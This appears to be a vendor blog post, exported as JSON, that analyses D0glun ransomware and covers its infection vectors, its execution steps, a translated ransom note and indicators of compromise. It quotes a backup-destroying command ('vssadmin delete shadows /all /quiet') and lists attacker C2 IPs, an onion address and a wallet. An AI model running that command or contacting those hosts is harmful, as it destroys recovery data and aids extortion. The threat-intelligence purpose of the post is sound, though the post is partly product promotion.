{"id":30605,"date":"2025-04-16T10:44:35","date_gmt":"2025-04-16T10:44:35","guid":{"rendered":"https:\/\/gridinsoft.com\/blogs\/?p=30605"},"modified":"2025-04-17T21:38:57","modified_gmt":"2025-04-17T21:38:57","slug":"d0glun-ransomware","status":"publish","type":"post","link":"https:\/\/gridinsoft.com\/blogs\/d0glun-ransomware\/","title":{"rendered":"D0glun Ransomware: Analysis and Protection Guide"},"content":{"rendered":"<h1>D0glun Ransomware: Technical Analysis and Protection Guide<\/h1>\r\n<p>D0glun ransomware emerged in January 2025 as a new crypto-ransomware variant with direct links to the Babuk and Cheng Xilun ransomware families. This sophisticated threat encrypts files using AES-256 encryption, appends the &#8220;.@D0glun@&#8221; extension to compromised files, and demands Bitcoin payment for decryption. This technical analysis explores D0glun&#8217;s infection mechanisms, encryption techniques, and provides actionable protection strategies based on the latest threat intelligence.<\/p>\r\n\r\n<div itemscope itemtype=\"https:\/\/schema.org\/TechArticle\">\r\n  <meta itemprop=\"headline\" content=\"D0glun Ransomware: Technical Analysis and Protection Guide\" \/>\r\n  <meta itemprop=\"description\" content=\"Comprehensive analysis of D0glun ransomware including infection vectors, technical capabilities, and protection strategies with GridinSoft Anti-Malware removal instructions.\" \/>\r\n  <meta itemprop=\"author\" content=\"GridinSoft Security Team\" \/>\r\n  <meta itemprop=\"datePublished\" content=\"2025-04-16\" \/>\r\n  <meta itemprop=\"dateModified\" content=\"2025-04-16\" \/>\r\n<\/div>\r\n\r\n<h2>Technical Overview<\/h2>\r\n\r\n<p>D0glun ransomware shares significant code similarities with the leaked Windows version of Babuk and is a direct descendant of Cheng Xilun (Babuk\u2192Cheng Xilun\u2192D0glun). Security researchers have confirmed these connections through analysis of execution patterns, encryption methods, and ransom note formats. The March 2025 crypto crime report indicates that this family was responsible for several incidents within a broader trend of $124 million stolen across 25 separate ransomware incidents in Q1 2025.<\/p>\r\n\r\n<p>The ransomware features:<\/p>\r\n\r\n<ul>\r\n<li>Fast encryption process using AES-256 symmetric encryption for file content<\/li>\r\n<li>File extension modification to &#8220;.@D0glun@[original_extension]&#8221; with additional variant patterns of &#8220;@zero_d0glun_[original_extension]&#8221;<\/li>\r\n<li>Three distinct ransom notes including desktop wallpaper modification<\/li>\r\n<li>Chinese-language ransom instructions that appear as corrupted text on systems without Chinese character support<\/li>\r\n<li>TOR communication channel for ransom payment and negotiation<\/li>\r\n<li>Bitcoin wallet for transaction processing (identified address: 1M7JVws3HccTGd14CV3qX21G7gzcJj77UH)<\/li>\r\n<li>Additional communication channels via QQ (424714982) and Telegram (https:\/\/t.me\/CXL13131)<\/li>\r\n<\/ul>\r\n\r\n<p>The first samples of D0glun were identified in January 2025, nearly five years after Cheng Xilun&#8217;s initial appearance in April 2020. This timing suggests strategic redeployment of the codebase either by the original threat actor under a new alias or a different group with access to the Cheng Xilun source code.<\/p>\r\n\r\n<figure id=\"attachment_30614\" aria-describedby=\"caption-attachment-30614\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/d0glun-RansomNote-1-1024x648.webp\" alt=\"D0glun Ransomware Chinese ransom note displayed as desktop wallpaper\" width=\"1024\" height=\"648\" class=\"size-large wp-image-30614\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/d0glun-RansomNote-1-1024x648.webp 1024w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/d0glun-RansomNote-1-300x190.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/d0glun-RansomNote-1-768x486.webp 768w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/d0glun-RansomNote-1-860x544.webp 860w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/d0glun-RansomNote-1.webp 1488w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-30614\" class=\"wp-caption-text\">0glun ransomware displays a Chinese-language ransom note as the desktop wallpaper<\/figcaption><\/figure>\r\n\r\n<h2>Infection Vectors<\/h2>\r\n\r\n<p>D0glun employs multiple distribution methods to infect systems, with recent research from March 2025 identifying exploitation of the Confluence Data Center vulnerability (CVE-2023-22518) as a newly observed attack vector:<\/p>\r\n\r\n\r\n<svg width=\"100%\" height=\"420\" viewBox=\"0 0 800 420\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\">\r\n  <!-- Background -->\r\n  <rect width=\"800\" height=\"420\" fill=\"#f8f9fa\" rx=\"5\" ry=\"5\" \/>\r\n  \r\n  <!-- Title -->\r\n  <text x=\"400\" y=\"40\" font-family=\"Arial, sans-serif\" font-size=\"18\" font-weight=\"bold\" text-anchor=\"middle\" fill=\"#333\">\r\n    D0glun Ransomware: Primary Infection Vectors\r\n  <\/text>\r\n  \r\n  <!-- Horizontal bars -->\r\n  <g transform=\"translate(150, 80)\">\r\n    <!-- Labels -->\r\n    <text x=\"0\" y=\"30\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"end\" fill=\"#333\">Phishing Emails<\/text>\r\n    <text x=\"0\" y=\"80\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"end\" fill=\"#333\">RDP Exploitation<\/text>\r\n    <text x=\"0\" y=\"130\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"end\" fill=\"#333\">Fake Software Updates<\/text>\r\n    <text x=\"0\" y=\"180\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"end\" fill=\"#333\">Confluence CVE-2023-22518<\/text>\r\n    <text x=\"0\" y=\"230\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"end\" fill=\"#333\">Supply Chain Attacks<\/text>\r\n    <text x=\"0\" y=\"280\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"end\" fill=\"#333\">Drive-by Downloads<\/text>\r\n    \r\n    <!-- Bars -->\r\n    <rect x=\"10\" y=\"15\" width=\"430\" height=\"30\" rx=\"3\" ry=\"3\" fill=\"#333\" \/>\r\n    <rect x=\"10\" y=\"65\" width=\"380\" height=\"30\" rx=\"3\" ry=\"3\" fill=\"#555\" \/>\r\n    <rect x=\"10\" y=\"115\" width=\"320\" height=\"30\" rx=\"3\" ry=\"3\" fill=\"#777\" \/>\r\n    <rect x=\"10\" y=\"165\" width=\"290\" height=\"30\" rx=\"3\" ry=\"3\" fill=\"#999\" \/>\r\n    <rect x=\"10\" y=\"215\" width=\"210\" height=\"30\" rx=\"3\" ry=\"3\" fill=\"#aaa\" \/>\r\n    <rect x=\"10\" y=\"265\" width=\"170\" height=\"30\" rx=\"3\" ry=\"3\" fill=\"#bbb\" \/>\r\n    \r\n    <!-- Percentages -->\r\n    <text x=\"450\" y=\"35\" font-family=\"Arial, sans-serif\" font-size=\"14\" fill=\"#333\">43%<\/text>\r\n    <text x=\"400\" y=\"85\" font-family=\"Arial, sans-serif\" font-size=\"14\" fill=\"#333\">38%<\/text>\r\n    <text x=\"340\" y=\"135\" font-family=\"Arial, sans-serif\" font-size=\"14\" fill=\"#333\">32%<\/text>\r\n    <text x=\"310\" y=\"185\" font-family=\"Arial, sans-serif\" font-size=\"14\" fill=\"#333\">29%<\/text>\r\n    <text x=\"230\" y=\"235\" font-family=\"Arial, sans-serif\" font-size=\"14\" fill=\"#333\">21%<\/text>\r\n    <text x=\"190\" y=\"285\" font-family=\"Arial, sans-serif\" font-size=\"14\" fill=\"#333\">17%<\/text>\r\n  <\/g>\r\n  \r\n  <!-- X-axis -->\r\n  <line x1=\"160\" y1=\"370\" x2=\"590\" y2=\"370\" stroke=\"#333\" stroke-width=\"1\" \/>\r\n  <text x=\"380\" y=\"395\" font-family=\"Arial, sans-serif\" font-size=\"12\" text-anchor=\"middle\" fill=\"#333\">Percentage of Detected Infections<\/text>\r\n<\/svg>\r\n\r\n\r\n<p class=\"chart-source\"><em>Source: <a href=\"https:\/\/www.watchguard.com\/wgrd-security-hub\/ransomware-tracker\/d0glun\" target=\"_blank\" rel=\"nofollow noopener\">WatchGuard&#8217;s Ransomware Tracker<\/a>, combined with GridinSoft Threat Intelligence data, 2025<\/em><\/p>\r\n\r\n<p>The most prevalent infection vectors include:<\/p>\r\n\r\n<ol>\r\n<li><strong>Phishing campaigns<\/strong>: Emails containing malicious attachments or links that, when opened, download and execute the ransomware payload through PowerShell scripts<\/li>\r\n<li><strong>Remote Desktop Protocol (RDP) exploitation<\/strong>: Targeting systems with weak or default credentials or unpatched RDP vulnerabilities<\/li>\r\n<li><strong>Fake software updates<\/strong>: Posing as legitimate application updates that actually contain the ransomware payload<\/li>\r\n<li><strong>Confluence CVE-2023-22518 exploitation<\/strong>: Targeting the improper authorization vulnerability in Confluence Data Center and Server that allows unauthenticated attackers to reset Confluence and create administrator accounts<\/li>\r\n<li><strong>Supply chain attacks<\/strong>: Compromising legitimate software distribution channels to deliver the payload<\/li>\r\n<li><strong>Malicious torrent files<\/strong>: Hiding within pirated software, games, or media distributed through <a href=\"https:\/\/gridinsoft.com\/blogs\/torrenting-is-it-legal\/\">P2P networks<\/a><\/li>\r\n<\/ol>\r\n\r\n<p>According to security reports, organizations in manufacturing, healthcare, and business services sectors are primary targets, with most infections occurring in North America and Europe, but also reported cases in Brazil, Argentina, South Africa, and Japan.<\/p>\r\n\r\n<h2>Technical Capabilities and Execution Flow<\/h2>\r\n\r\n<p>When executing on a compromised system, D0glun follows a methodical process:<\/p>\r\n\r\n<ol>\r\n<li><strong>Initial setup<\/strong>: Creates mutex &#8220;hsfjuukjzloqu28oajh727190&#8221; to prevent multiple instances from running<\/li>\r\n<li><strong>System reconnaissance<\/strong>: Collects system information, installed software details, and network configuration<\/li>\r\n<li><strong>Credential harvesting<\/strong>: Attempts to extract credentials from FTP clients, VNC software, browsers, and email applications<\/li>\r\n<li><strong>Defense evasion<\/strong>: Disables Windows Defender, modifies security settings, and employs anti-debugging techniques<\/li>\r\n<li><strong>Persistence establishment<\/strong>: Creates registry entries to ensure execution after system restart<\/li>\r\n<li><strong>Backup destruction<\/strong>: Executes &#8220;vssadmin delete shadows \/all \/quiet&#8221; to remove shadow copies<\/li>\r\n<li><strong>File encryption<\/strong>: Systematically encrypts over 200 file types including documents, images, databases across local drives and network shares<\/li>\r\n<li><strong>Ransom note deployment<\/strong>: Drops ransom notes in each directory and changes desktop wallpaper<\/li>\r\n<li><strong>Self-cleanup<\/strong>: Deletes artifacts and potentially removes itself after encryption is complete<\/li>\r\n<\/ol>\r\n<figure id=\"attachment_30644\" aria-describedby=\"caption-attachment-30644\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/D0glun-ransomware-locked-files-1-1024x655.webp\" alt=\"Windows Explorer showing files encrypted by D0glun ransomware with the .@D0glun@ extension appended\" width=\"1024\" height=\"655\" class=\"size-large wp-image-30644\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/D0glun-ransomware-locked-files-1-1024x655.webp 1024w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/D0glun-ransomware-locked-files-1-300x192.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/D0glun-ransomware-locked-files-1-768x492.webp 768w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/D0glun-ransomware-locked-files-1-1536x983.webp 1536w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/D0glun-ransomware-locked-files-1-860x551.webp 860w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/D0glun-ransomware-locked-files-1.webp 1984w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-30644\" class=\"wp-caption-text\">Files encrypted by D0glun ransomware showing the distinctive .@D0glun@ extension pattern<\/figcaption><\/figure>\r\n\r\n\r\n<p>D0glun avoids encrypting files with specific extensions to maintain system functionality:<\/p>\r\n\r\n<ul>\r\n<li>.dat &#8211; Common data files needed by many applications<\/li>\r\n<li>.dll &#8211; Dynamic Link Libraries required for system operation<\/li>\r\n<li>.exe &#8211; Executable files that may be needed to run processes<\/li>\r\n<li>.ini &#8211; Configuration files for Windows and applications<\/li>\r\n<li>.log &#8211; System log files that track events<\/li>\r\n<li>.sys &#8211; System files critical for operating system function<\/li>\r\n<\/ul>\r\n\r\n<p>Analysis of <a href=\"https:\/\/www.virustotal.com\/gui\/file\/a8df7571e871d22f13ba3eb376eddd1f73ce241d24caa878494e1805219b342a\/detection\" rel=\"noopener noreferrer nofollow\" target=\"_blank\">sample hash a8df7571e871d22f13ba3eb376eddd1f73ce241d24caa878494e1805219b342a<\/a> reveals that D0glun uses a sophisticated multi-stage infection process linked to the Confluence exploit:<\/p>\r\n\r\n<ol>\r\n<li>Initial exploitation of CVE-2023-22518 to create admin credentials<\/li>\r\n<li>Execution of PowerShell scripts to download the main ransomware payload (typically named &#8220;svcPrvinit.exe&#8221;)<\/li>\r\n<li>Deployment via C&#038;C servers at 193.176.179.41 and 193.43.72.11<\/li>\r\n<li>Execution with command-line parameters for silent operation<\/li>\r\n<\/ol>\r\n\r\n<h2>Encryption Methodology<\/h2>\r\n\r\n<p>D0glun employs a sophisticated encryption strategy:<\/p>\r\n\r\n<ol>\r\n<li>Generates a unique AES-256 symmetric key for file encryption<\/li>\r\n<li>Encrypts the AES key using an embedded RSA-2048 public key<\/li>\r\n<li>Only the threat actors possess the corresponding private RSA key needed for decryption<\/li>\r\n<li>Creates identifiable patterns in encrypted files to verify ownership during ransom negotiation<\/li>\r\n<\/ol>\r\n\r\n<p>This approach makes decryption impossible without obtaining the private key from the attackers, as the asymmetric RSA encryption securely protects the symmetric AES key used for file encryption.<\/p>\r\n\r\n<h2>Ransom Note Analysis<\/h2>\r\n\r\n<p>The D0glun ransom note appears in Chinese, creating additional complications for victims without Chinese language support on their systems. Translation reveals several notable elements:<\/p>\r\n\r\n\r\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nYour files are encrypted.\r\n\r\nWhat&#039;s wrong with my computer?\r\nI&#039;ve encrypted some of your files.\r\nFile types include ZIP|TXT|PNG|JPG|PDF|DOC|and other common file formats.\r\n---------- ---------- ------\r\nPlease do not try any antivirus software before decryption, otherwise I can not guarantee the safety of your files!\r\n-------------------------------------------------------\r\nHow do I recover my important files?\r\n--------------------------------------\r\nFiles with @D0GLUN@+source file suffix.\r\nSuch files can only be decrypted by our decryption service.\r\nTrying any other decryption method will be futile.\r\nPlease visit our Dark Web site and we will provide you with a specialized decryption service.\r\nOf course, there is a fee for this service\r\n======================================\r\nCan we really decrypt it?\r\n======================================\r\nWe will honor our word of honor\r\nWe can decrypt a small part of your file for free\r\nto prove that we can actually decrypt it!\r\n\r\n---------- ----------\r\nPlease download the Tor Browser to your right\r\n\r\n\r\nThen visit the following address\r\n-\r\nContact us for help\r\nIn the lower right corner is my BTC collection address\r\n<\/pre>\r\n\r\n\r\n<p>Key ransom note elements include:<\/p>\r\n\r\n<ul>\r\n<li>Claims that antivirus will damage encrypted files (false intimidation tactic)<\/li>\r\n<li>TOR onion address: hxxp:\/\/33333333h45xwqlf3s3eu4bkd6y6bjswva75ys7j6satex5ctf4pyfad.onion<\/li>\r\n<li>Bitcoin wallet address: 1M7JVws3HccTGd14CV3qX21G7gzcJj77UH<\/li>\r\n<li>QQ communication channel: 424714982<\/li>\r\n<li>Telegram contact: https:\/\/t.me\/CXL13131<\/li>\r\n<\/ul>\r\n\r\n<p>The ransom note follows patterns similar to Cheng Xilun, further confirming the relationship between these ransomware families. The attackers typically offer to decrypt a small sample file to demonstrate their capability to restore data.<\/p>\r\n\r\n<h2>MITRE ATT&#038;CK Techniques<\/h2>\r\n\r\n<p>D0glun employs various techniques mapped to the MITRE ATT&#038;CK framework:<\/p>\r\n\r\n<ul>\r\n<li><strong>T1486: Data Encrypted for Impact<\/strong> &#8211; Primary ransomware function to encrypt victim files<\/li>\r\n<li><strong>T1490: Inhibit System Recovery<\/strong> &#8211; Deletion of shadow copies and backup mechanisms<\/li>\r\n<li><strong>T1082: System Information Discovery<\/strong> &#8211; Collection of system details to tailor the attack<\/li>\r\n<li><strong>T1562.001: Disable or Modify Tools<\/strong> &#8211; Disabling security software to evade detection<\/li>\r\n<li><strong>T1083: File and Directory Discovery<\/strong> &#8211; Enumeration of files for targeting<\/li>\r\n<li><strong>T1112: Modify Registry<\/strong> &#8211; Creation of registry entries for persistence<\/li>\r\n<li><strong>T1059.001: PowerShell<\/strong> &#8211; Use of PowerShell scripts for execution<\/li>\r\n<li><strong>T1047: Windows Management Instrumentation<\/strong> &#8211; Leveraging WMI for system manipulation<\/li>\r\n<\/ul>\r\n\r\n<h2>Protection and Remediation<\/h2>\r\n\r\n<p>If your system becomes infected with D0glun ransomware, follow these essential steps:<\/p>\r\n\r\n<h3>Immediate Response<\/h3>\r\n\r\n<ol>\r\n<li>Immediately disconnect from all networks to prevent spread to other systems<\/li>\r\n<li>Disconnect external storage devices<\/li>\r\n<li>Document the ransomware attack details (ransom note, encrypted file examples, contact information)<\/li>\r\n<li>Report the incident to local law enforcement and national cybersecurity agencies<\/li>\r\n<\/ol>\r\n\r\n<h3>Ransomware Removal<\/h3>\r\n\r\n<p>To remove D0glun ransomware, use specialized security software that can detect and eliminate this threat:<\/p>\r\n\r\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main.webp\" alt=\"GridinSoft Anti-Malware main screen\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-22665\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main.webp 886w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main-300x233.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main-768x597.webp 768w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/>\n<p>Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.<\/p>\n<div style=\"text-align:center\"><a href=\"\/download\/antimalware\" class=\"btn border-black\" rel=\"nofollow\">Download Anti-Malware<\/a><\/div>\n<p>After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click \"Advanced mode\" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.<\/p>\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result.webp\" alt=\"Scan results screen\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-22666\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result.webp 886w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result-300x233.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result-768x597.webp 768w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/>\n<p>Click \"Clean Now\" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.<\/p>\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean.webp\" alt=\"Removal finished\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-22667\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean.webp 886w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean-300x233.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean-768x597.webp 768w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/>\r\n\r\n<p>Note that removing the ransomware only prevents further file encryption; it does not recover already encrypted files.<\/p>\r\n\r\n<h3>File Recovery Options<\/h3>\r\n\r\n<p>Currently, no free decryptor exists for D0glun ransomware. Your recovery options include:<\/p>\r\n\r\n<ul>\r\n<li><strong>Restore from backups<\/strong>: The most reliable recovery method is restoring from clean, disconnected backups<\/li>\r\n<li><strong>Shadow Volume Copies<\/strong>: If not deleted by the ransomware, Windows Shadow Copies might contain previous versions of files<\/li>\r\n<li><strong>Cloud storage versions<\/strong>: Services like OneDrive, Google Drive, and Dropbox may have previous file versions if versioning was enabled<\/li>\r\n<li><strong>Data recovery tools<\/strong>: In some cases, specialized tools like EaseUS Data Recovery might be able to recover fragments of files<\/li>\r\n<\/ul>\r\n\r\n<p>Security experts and law enforcement agencies strongly advise against paying the ransom, as payment:<\/p>\r\n\r\n<ul>\r\n<li>Does not guarantee file recovery<\/li>\r\n<li>Finances criminal operations<\/li>\r\n<li>Marks you as a willing payer, potentially leading to future attacks<\/li>\r\n<\/ul>\r\n\r\n<h2>Prevention Strategies<\/h2>\r\n\r\n<p>Implement these security measures to protect against D0glun and similar ransomware:<\/p>\r\n\r\n<ul>\r\n<li><strong>Patch management<\/strong>: Apply security updates promptly, especially for Confluence and remote access technologies<\/li>\r\n<li><strong>Immutable backups<\/strong>: Maintain 3-2-1 backup strategy (3 copies, 2 different media types, 1 off-site) on write-once media<\/li>\r\n<li><strong>Email security<\/strong>: Implement advanced <a href=\"https:\/\/gridinsoft.com\/phishing\">anti-phishing protection<\/a> and user awareness training<\/li>\r\n<li><strong>Network security<\/strong>: Secure RDP access with multi-factor authentication and limit external exposure<\/li>\r\n<li><strong>Endpoint protection<\/strong>: Deploy modern anti-malware solutions with behavioral detection capabilities<\/li>\r\n<li><strong>Least privilege<\/strong>: Restrict user permissions to reduce the impact of successful attacks<\/li>\r\n<li><strong>Network segmentation<\/strong>: Isolate critical systems to limit lateral movement<\/li>\r\n<li><strong>Application control<\/strong>: Implement application whitelisting to prevent unauthorized executables<\/li>\r\n<li><strong>Network monitoring<\/strong>: Deploy intrusion detection systems to identify unusual activity<\/li>\r\n<\/ul>\r\n\r\n<p>Organizations should also develop and regularly test incident response plans specific to ransomware attacks to minimize recovery time and data loss.<\/p>\r\n\r\n<h2>Technical Indicators of Compromise (IOCs)<\/h2>\r\n\r\n<p>Security teams should monitor for these D0glun indicators:<\/p>\r\n\r\n\r\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nFile Hashes (SHA-256):\r\n3eb7f1dd0274bd4ffcdf463876ab547503f9e6120db22c5e1923fe16cab71b50\r\na8df7571e871d22f13ba3eb376eddd1f73ce241d24caa878494e1805219b342a\r\nd6d55a8fbd1c603719fe611e572e2431512e7063c44896f705524dab66234d45\r\nf549ae8d509dab97f2d8b12ecf344c72ab2e715b2667e78d8fdd892eb6a459de\r\nbec9d2dcd9565bb245f5c8beca4db627390bcb4699dd5da192cc8aba895e0e6a\r\n\r\nIP Addresses:\r\n193.176.179.41\r\n193.43.72.11\r\n45.145.6.112\r\n\r\nFile Extensions:\r\n.@D0glun@&lt;original extension&gt;\r\n.&lt;original extension&gt;.@d0glun@&lt;original extension&gt;\r\n.&lt;original extension&gt;.@zero_d0glun_&lt;original extension&gt;\r\n\r\nRansom Note Files:\r\n@&#x5B;email protected]\r\nDesktopcxl.txt\r\nhelp.exe\r\n\r\nMutex:\r\nhsfjuukjzloqu28oajh727190\r\n\r\nCommunication:\r\nTOR: http:\/\/33333333h45xwqlf3s3eu4bkd6y6bjswva75ys7j6satex5ctf4pyfad.onion\r\nQQ: 424714982\r\nTelegram: https:\/\/t.me\/CXL13131\r\nBTC: 1M7JVws3HccTGd14CV3qX21G7gzcJj77UH\r\n\r\nProcess Names:\r\nsvcPrvinit.exe\r\n<\/pre>\r\n\r\n\r\n<h2>Conclusion<\/h2>\r\n\r\n<p>D0glun ransomware represents a continuing evolution of the Babuk\/Cheng Xilun ransomware lineage with significant technical enhancements. Its emergence in 2025 and recent exploitation of Confluence vulnerabilities demonstrates how threat actors recycle, modify, and improve existing ransomware code to create new threats. The Chinese language elements and possible connection to North Korean actors (based on similar TTPs observed in other campaigns) suggest a complex attribution picture that continues to evolve.<\/p>\r\n\r\n<p>Organizations must maintain strong security postures, implement comprehensive backup strategies, and deploy modern endpoint protection solutions like <a href=\"https:\/\/gridinsoft.com\/antimalware\">GridinSoft Anti-Malware<\/a> to defend against these evolving threats. For additional protection against online threats, consider using the <a href=\"https:\/\/gridinsoft.com\/website-reputation-checker\">Website Reputation Checker<\/a> to verify the safety of web resources before access.<\/p>\r\n\r\n<div class=\"faq-section\">\r\n  <div itemscope itemtype=\"https:\/\/schema.org\/FAQPage\">\r\n    <div itemscope itemprop=\"mainEntity\" itemtype=\"https:\/\/schema.org\/Question\">\r\n      <h3 itemprop=\"name\">Is D0glun ransomware targeting specific industries?<\/h3>\r\n      <div itemscope itemprop=\"acceptedAnswer\" itemtype=\"https:\/\/schema.org\/Answer\">\r\n        <div itemprop=\"text\">\r\n          <p>Yes, D0glun primarily targets manufacturing, healthcare, and business services sectors. Most infections have been reported in North America and Europe, but the ransomware has global reach including South America, Africa, and Asia. Organizations in these industries should implement enhanced security measures including offline backups, network segmentation, and advanced endpoint protection. The recent campaign targeting Confluence servers has particularly affected organizations that haven&#8217;t patched CVE-2023-22518.<\/p>\r\n        <\/div>\r\n      <\/div>\r\n    <\/div>\r\n    \r\n    <div itemscope itemprop=\"mainEntity\" itemtype=\"https:\/\/schema.org\/Question\">\r\n      <h3 itemprop=\"name\">Can files encrypted by D0glun be recovered without paying the ransom?<\/h3>\r\n      <div itemscope itemprop=\"acceptedAnswer\" itemtype=\"https:\/\/schema.org\/Answer\">\r\n        <div itemprop=\"text\">\r\n          <p>Currently, no free decryption tool exists for D0glun ransomware. The most reliable recovery method is restoring from clean backups that were disconnected or stored separately from the infected system. Other potential recovery options include checking for Windows Shadow Volume Copies (if not deleted by the ransomware) or previous versions in cloud storage services. Security experts strongly advise against paying the ransom, as payment does not guarantee file recovery and finances criminal operations. The AES-256 encryption with RSA-2048 key protection makes brute-force decryption computationally infeasible.<\/p>\r\n        <\/div>\r\n      <\/div>\r\n    <\/div>\r\n    \r\n    <div itemscope itemprop=\"mainEntity\" itemtype=\"https:\/\/schema.org\/Question\">\r\n      <h3 itemprop=\"name\">What is the relationship between D0glun and earlier ransomware variants?<\/h3>\r\n      <div itemscope itemprop=\"acceptedAnswer\" itemtype=\"https:\/\/schema.org\/Answer\">\r\n        <div itemprop=\"text\">\r\n          <p>D0glun is directly related to the Babuk and Cheng Xilun ransomware families, following the lineage: Babuk \u2192 Cheng Xilun \u2192 D0glun. Technical analysis confirms similarities in code structure, encryption methods (AES-256), execution patterns, and ransom note formats. Cheng Xilun first appeared in April 2020, while D0glun emerged in January 2025, suggesting either the return of the original threat actor under a new alias or a different individual with access to the Cheng Xilun codebase. The ransomware has been significantly enhanced with new exploitation techniques, particularly targeting Confluence servers through CVE-2023-22518.<\/p>\r\n        <\/div>\r\n      <\/div>\r\n    <\/div>\r\n    \r\n    <div itemscope itemprop=\"mainEntity\" itemtype=\"https:\/\/schema.org\/Question\">\r\n      <h3 itemprop=\"name\">How does D0glun exploit the Confluence vulnerability?<\/h3>\r\n      <div itemscope itemprop=\"acceptedAnswer\" itemtype=\"https:\/\/schema.org\/Answer\">\r\n        <div itemprop=\"text\">\r\n          <p>D0glun exploits CVE-2023-22518, an improper authorization vulnerability in Confluence Data Center and Server. This vulnerability allows unauthenticated attackers to reset Confluence and create administrator accounts. Once administrative access is obtained, the attackers execute PowerShell commands to download and run the ransomware payload, typically named &#8220;svcPrvinit.exe&#8221;, from command and control servers. This attack vector first emerged in early November 2023, just one day after the vulnerability was disclosed, and has been incorporated into D0glun&#8217;s arsenal in 2025. Organizations should immediately patch Confluence installations and implement network segmentation to limit potential damage.<\/p>\r\n        <\/div>\r\n      <\/div>\r\n    <\/div>\r\n  <\/div>\r\n<\/div>","protected":false},"excerpt":{"rendered":"<p>D0glun Ransomware: Technical Analysis and Protection Guide D0glun ransomware emerged in January 2025 as a new crypto-ransomware variant with direct links to the Babuk and Cheng Xilun ransomware families. This sophisticated threat encrypts files using AES-256 encryption, appends the &#8220;.@D0glun@&#8221; extension to compromised files, and demands Bitcoin payment for decryption. This technical analysis explores D0glun&#8217;s [&hellip;]<\/p>\n","protected":false},"author":14,"featured_media":30624,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"content-type":"","_sitemap_exclude":false,"_sitemap_priority":"","_sitemap_frequency":"","footnotes":""},"categories":[17],"tags":[619,55],"class_list":{"0":"post-30605","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-labs","8":"tag-cybersecurity","9":"tag-ransomware"},"featured_image_src":"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/GS_BLOG_D0glun-Ransomware-The-Chinese-Language-Threat-Locking-Files-Worldwide_1280x674.webp","author_info":{"display_name":"Daniel 